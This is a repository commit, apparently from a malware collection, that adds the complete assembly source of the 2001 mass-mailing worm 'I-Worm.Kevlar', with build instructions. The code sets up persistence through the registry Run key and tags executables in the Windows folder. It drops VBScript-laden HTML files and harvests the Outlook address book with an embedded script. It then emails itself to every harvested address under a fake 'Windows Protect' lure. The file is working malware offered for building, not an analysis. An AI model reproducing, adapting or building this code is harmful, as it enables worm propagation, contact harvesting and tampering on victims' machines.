Updated dir structure in Win32

2026-06-16 15:59:24 +00:00 · 2020-10-16 23:26:21 +02:00
parent b022d14189
commit cfc6699241
173 changed files with 0 additions and 0 deletions
@@ -0,0 +1,651 @@
+comment #
+Name : I-Worm.Kevlar
+Author : PetiK
+Date : August 7th 2001 - August 16th 2001
+Size : 5120 byte
+
+Action : Copy itself to %System%\Kevlar32.exe hidden attribute
+			%System%\MScfg32.exe normal attribute
+	 Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
+
+	* Infect %Windir%\C???????.exe file on writing as "PetiK" in the file
+	* Infect %Windir%\*.exe It add .htm and create a new file with ActiveX
+	* Create C:\__.vbs This filetake all address in th e Address Book at save them in the
+	  %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail :
+
+		Subject : Windows Protect !!
+		Body :  The smallest software to stop your computer to bug in each time.
+			I have found this program on WWW.KEVLAR-PROTECT.COM
+
+			Take a look at the attchment.
+
+					Bye and have a nice day.
+
+		Attachment : MScfg32.exe
+
+	* It creates the %windir%\MSinfo32.txt. I look like this :
+
+		[File Infected]		=> Name of C???????.exe file infected
+		CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
+		CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
+
+		[EMail saved]		=> Some address found in the address book
+		first@mail.com=Next victim
+		second@mail.com=Next victim
+
+
+To build the worm:
+tasm32 /M /ML Kevlar
+tlink32 -Tpe -aa -x Kevlar,,,import32
+upx -9 Kevlar.exe
+
+To delete the worm:
+@echo off
+del %windir%\system\Kevlar32.exe
+del %windir%\system\MScfg32.exe
+del %windir%\*.exe.htm
+del %windir%\MSinfo32.txt
+del %windir%\AddBook.txt
+
+#
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+callx macro a
+extrn a:proc
+call a
+endm
+
+include useful.inc
+
+DEBUT:	
+F_NAME:	push  50
+	mov   esi,offset Orig
+	push  esi
+	push  0
+	callx GetModuleFileNameA
+
+	mov   edi,offset CopyName2
+	push  edi
+	push  50
+	push  edi
+	callx GetSystemDirectoryA
+	add   edi,eax
+	mov   eax,'cSM\'
+	stosd
+	mov   eax,'23gf'
+	stosd
+	mov   eax,'exe.'
+	stosd
+	pop   edi
+	push  0
+	push  edi
+	push  esi
+	callx CopyFileA
+
+	mov   edi,offset CopyName
+	push  edi
+	push  50
+	push  edi
+	callx GetSystemDirectoryA
+	add   edi,eax
+	mov   al,'\'
+	stosb
+	mov   eax,'lveK'
+	stosd
+	mov   eax,'23ra'
+	stosd
+	mov   eax,'exe.'
+	stosd
+	pop   edi
+
+	push  esi
+	callx GetFileAttributesA
+	cmp   eax,1
+	je    SUITE
+
+	push  0
+	push  edi
+	push  esi
+	callx CopyFileA
+
+	push  01h
+	push  edi
+	callx SetFileAttributesA
+
+
+REG:	pushad
+	@pushsz "SHLWAPI.dll"
+	callx LoadLibraryA
+	test  eax,eax
+	jz    FIN
+	mov   edi,eax
+	@pushsz "SHSetValueA"
+	push  edi
+	callx GetProcAddress
+	test  eax,eax
+	jz    FIN
+	mov   esi,eax
+	push  08h
+	push  offset CopyName
+	push  01h
+	@pushsz "Kevlar32"
+	@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
+	push  80000002h
+	call  esi
+	push  edi
+	callx FreeLibrary
+	popad
+
+	call  Nick
+	
+	mov   edi,offset nickname
+	push  40h
+	@pushsz "Hello, my name is :"
+	push  edi
+	push  0
+	callx MessageBoxA
+
+	call  Infect
+
+	jmp   FIN
+
+SUITE:	call  Infect2
+VB_F:	pushad
+	push  00h
+	push  80h
+	push  02h
+	push  00h
+	push  01h
+	push  40000000h
+	@pushsz "C:\__.vbs"
+	callx CreateFileA
+	test  eax,eax
+	xchg  edi,eax
+	push  00h
+	push  offset octets
+	push  VBSSIZE
+	push  offset vbsd
+	push  edi
+	callx WriteFile
+	push  edi
+	callx CloseHandle
+	popad
+	push  1
+	@pushsz "wscript C:\__.vbs"
+	callx WinExec
+	push  10000
+	callx Sleep
+	@pushsz "C:\__.vbs"
+	callx DeleteFileA
+
+SCAN1:	mov   edi,offset addbook
+	push  edi
+	push  50
+	push  edi
+	callx GetWindowsDirectoryA
+	add   edi,eax
+	mov   eax,"ddA\"
+	stosd
+	mov   eax,"kooB"
+	stosd
+	mov   eax,"txt."
+	stosd
+	xor   eax,eax
+	stosd
+	call  OPEN
+
+FIN:	push  00h
+	callx ExitProcess
+
+	Nick 	Proc
+	mov   edi,offset nickname
+	callx GetTickCount
+	push  9
+	pop   ecx
+	xor   edx,edx
+	div   ecx
+	inc   edx
+	mov   ecx,edx
+	name_g:
+	push  ecx
+	callx GetTickCount
+	push  'Z'-'A'
+	pop   ecx
+	xor   edx,edx
+	div   ecx
+	xchg  eax,edx
+	add   al,'A'
+	stosb
+	callx GetTickCount
+	push  100
+	pop   ecx
+	xor   edx,edx
+	div   ecx
+	push  edx
+	callx Sleep
+	pop   ecx
+	loop  name_g
+	ret
+	Nick	EndP
+
+	Infect  Proc
+	pushad
+	push  50
+	push  offset WinPath
+	callx GetWindowsDirectoryA
+	push  offset WinPath
+	callx SetCurrentDirectoryA
+	FFF:
+	push  offset Search
+	@pushsz "C???????.exe"
+	callx FindFirstFileA
+	inc   eax
+	je    F_INF
+	dec   eax
+	mov   [exeHdl],eax
+	I_FILE:
+	mov   verif,0
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  03h
+	push  eax
+	push  eax
+	push  80000000h or 40000000h
+	push  offset Search.cFileName
+	callx CreateFileA
+	inc   eax
+	jz    FNF
+	dec   eax
+	xchg  eax,ebx
+
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  eax
+	push  04h
+	push  eax
+	push  ebx	
+	callx CreateFileMappingA
+	test  eax,eax
+	jz    CL1
+	xchg  eax,ebp
+
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  eax
+	push  06h
+	push  ebp
+	callx MapViewOfFile
+	test  eax,eax
+	jz    CL2
+	xchg  eax,edi
+	
+	mov   esi,eax
+	cmp   word ptr [esi],"ZM"
+	jne   CL2
+	cmp   byte ptr [esi+18h],"@"
+	jne   CL2
+	cmp   word ptr [esi+80h],"EP"
+	jne   CL2
+	cmp   byte ptr [esi+12h],"P"
+	je    CL2
+	mov   word ptr [esi+12h],"eP"
+	mov   word ptr [esi+14h],"it"
+	mov   byte ptr [esi+16h],"K"
+	inc   verif
+	push  edi
+	callx UnmapViewOfFile
+	CL2:
+	push  ebp
+	callx CloseHandle
+	CL1:
+	push  ebx
+	callx CloseHandle
+
+	cmp   verif,1
+	jne   FNF
+	mov   edi,offset InfoFile
+	push  edi
+	push  50
+	push  edi
+	callx GetWindowsDirectoryA
+	add   edi,eax
+	mov   eax,'iSM\'
+	stosd
+	mov   eax,'3ofn'
+	stosd
+	mov   eax,'xt.2'
+	stosd
+	mov   al,'t'
+	stosb
+	pop   edi
+	mov   esi,edi
+	push  esi
+	@pushsz "Infected by W32.Kevlar.PetiK"
+	push    offset Search.cFileName
+	@pushsz "File Infected"	
+	callx   WritePrivateProfileStringA
+
+	FNF:
+	push  offset Search
+	push  [exeHdl]
+	callx FindNextFileA
+	test  eax,eax
+	jne   I_FILE
+	FC:
+	push  [exeHdl]
+	callx FindClose
+	F_INF:
+	popad
+	ret
+	Infect	EndP
+
+	Infect2	Proc
+	pushad
+	push  50
+	push  offset WinPath
+	callx GetWindowsDirectoryA
+	push  offset WinPath
+	callx SetCurrentDirectoryA
+	FFF2:
+	push  offset Search
+	@pushsz "*.exe"
+	callx FindFirstFileA
+	inc   eax
+	je    F_INF2
+	dec   eax
+	mov   [exeHdl],eax
+	I_FILE2:
+	pushad
+	mov   edi,offset Search.cFileName
+	push  edi
+	callx lstrlen
+	add   edi,eax
+	mov   eax,"mth."
+	stosd
+	xor   eax,eax
+	stosd
+	push  00h
+	push  80h
+	push  02h
+	push  00h
+	push  01h
+	push  40000000h
+	push  offset Search.cFileName
+	callx CreateFileA
+	test  eax,eax
+	xchg  ebp,eax
+	push  00h
+	push  offset octets
+	push  HTMSIZE
+	push  offset htmd
+	push  ebp
+	callx WriteFile
+	push  ebp
+	callx CloseHandle
+	popad
+	FNF2:
+	push  offset Search
+	push  [exeHdl]
+	callx FindNextFileA
+	test  eax,eax
+	jne   I_FILE2
+	FC2:
+	push  [exeHdl]
+	callx FindClose
+	F_INF2:
+	popad
+	ret
+	Infect2	EndP
+
+OPEN:	pushad
+	push  00h
+	push  80h
+	push  03h
+	push  00h
+	push  01h
+	push  80000000h
+	push  offset addbook
+	callx CreateFileA
+	inc   eax
+	je    NO
+	dec   eax
+	xchg  eax,ebx
+
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  eax
+	push  02h
+	push  eax
+	push  ebx
+	callx CreateFileMappingA
+	test  eax,eax
+	je    F1
+	xchg  eax,ebp
+
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  eax
+	push  04h
+	push  ebp
+	callx MapViewOfFile
+	test  eax,eax
+	je    F2
+	xchg  eax,esi
+
+	push  00h
+	push  ebx
+	callx GetFileSize
+	cmp   eax,03h
+	jbe   F3					; is the file empty ??
+
+	call  SCAN
+
+F3:	push  esi
+	callx UnmapViewOfFile
+F2:	push  ebp
+	callx CloseHandle
+F1:	push  ebx
+	callx CloseHandle
+NO:	popad
+	ret
+
+	SCAN:
+	pushad
+	xor   edx,edx
+	mov   edi,offset m_addr
+	push  edi
+	p_c:  lodsb
+	cmp   al," "
+	je    car_s
+	cmp   al,0dh
+	je    entr1
+	cmp   al,0ah
+	je    entr2
+	cmp   al,"!"
+	je    f_mail
+	cmp   al,"@"
+	je    not_a
+	inc   edx
+	not_a:	stosb
+		jmp p_c
+	car_s:	inc esi
+		jmp p_c
+	entr1:	xor al,al
+		stosb
+		pop edi
+		test edx,edx
+		je  SCAN
+		call SEND_MAIL
+		jmp SCAN
+	entr2:	xor al,al
+		stosb
+		pop edi
+		jmp SCAN
+	f_mail:	popad
+		ret
+
+	SEND_MAIL:
+		push  50
+		push  offset save_addr
+		callx GetWindowsDirectoryA
+		@pushsz "\MSinfo32.txt"
+		push  offset save_addr
+		callx lstrcat
+		push  offset save_addr
+		@pushsz "Next victim"
+		push  offset m_addr
+		@pushsz "EMail saved"	
+		callx   WritePrivateProfileStringA
+		xor   eax,eax
+		push  eax
+		push  eax
+		push  offset Message
+		push  eax
+		push  [MAPIHdl]
+		callx MAPISendMail
+		ret
+
+
+
+.data
+; ===== INSTALLATION =====
+Orig		db 50 dup (0)
+CopyName	db 50 dup (0)
+CopyName2	db 50 dup (0)
+nickname	db 11 dup (?)
+
+; ===== INFECTION =====
+InfoFile	db 50 dup (0)
+WinPath		db 50 dup (0)
+exeHdl		dd ?
+verif		dd ?
+octets		dd ?
+
+; ===== MAIL =====
+addbook		db 50 dup (0)
+save_addr	db 50 dup (0)
+m_addr		db 128 dup (?)
+MAPIHdl		dd 0
+subject		db "Windows Protect !!",00h
+body		db "The smallest software to stop your computer to bug in each time.",0dh,0ah
+		db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
+		db "Take a look at the attchment.",0dh,0ah,0dh,0ah
+		db 09h,09h,"Bye and have a nice day.",00h
+NameFrom	db "Your friend",00h
+
+
+Message		dd ?
+		dd offset subject
+		dd offset body
+		dd ?
+		dd ?
+		dd ?
+		dd 2
+		dd offset MsgFrom
+		dd 1
+		dd offset MsgTo
+		dd 1
+		dd offset Attach
+
+MsgFrom		dd ?
+		dd ?
+		dd NameFrom
+		dd ?
+		dd ?
+		dd ?
+
+MsgTo		dd ?
+		dd 1
+		dd offset m_addr
+		dd offset m_addr
+		dd ?
+		dd ?
+
+Attach		dd ?
+		dd ?
+		dd ?
+		dd offset CopyName2
+		dd ?
+		dd ?
+
+		
+
+htmd:
+db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
+db '<script language=vbscript>',0dh,0ah
+db 'on error resume next',0dh,0ah
+db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
+db 'If err.number=429 then',0dh,0ah
+db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
+db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
+db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
+db 'Else',0dh,0ah
+db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
+db 'document.write "<font face=''verdana'' size=''3'' color=red>'
+db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
+db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
+db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
+db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah
+db 'End If',0dh,0ah
+db '</script></html>',00h
+HTMSIZE	= $-htmd
+
+vbsd:
+db 'On Error Resume Next',0dh,0ah
+db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
+db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
+db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
+db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
+db 'c.Close',0dh,0ah
+db 'For Each M In L.AddressLists',0dh,0ah
+db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
+db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
+db 'Set P = M.AddressEntries(O)',0dh,0ah
+db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
+db 'c.WriteLine P.Address',0dh,0ah
+db 'c.Close',0dh,0ah
+db 'Next',0dh,0ah
+db 'End If',0dh,0ah
+db 'Next',0dh,0ah
+db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
+db 'c.WriteLine "!"',0dh,0ah
+db 'c.Close',0dh,0ah
+VBSSIZE	= $-vbsd
+
+signature	db "I-Worm.Kevlar coded by PetiK (c)2001",00h
+
+
+MAX_PATH		equ 260
+FILETIME		struct
+dwLowDateTime		dd ?
+dwHighDateTime		dd ?
+FILETIME		ends
+WIN32_FIND_DATA 	struct
+dwFileAttributes	dd ?
+ftCreationTime		FILETIME ?
+ftLastAccessTime	FILETIME ?
+ftLastWriteTime		FILETIME ?
+nFileSizeHigh		dd ?
+nFileSizeLow		dd ?
+dwReserved0		dd ?
+dwReserved1		dd ?
+cFileName		dd MAX_PATH (?)
+cAlternateFileName	db 13 dup (?)
+			db 3 dup (?)
+WIN32_FIND_DATA		ends
+
+Search		WIN32_FIND_DATA <>
+
+
+end DEBUT
+end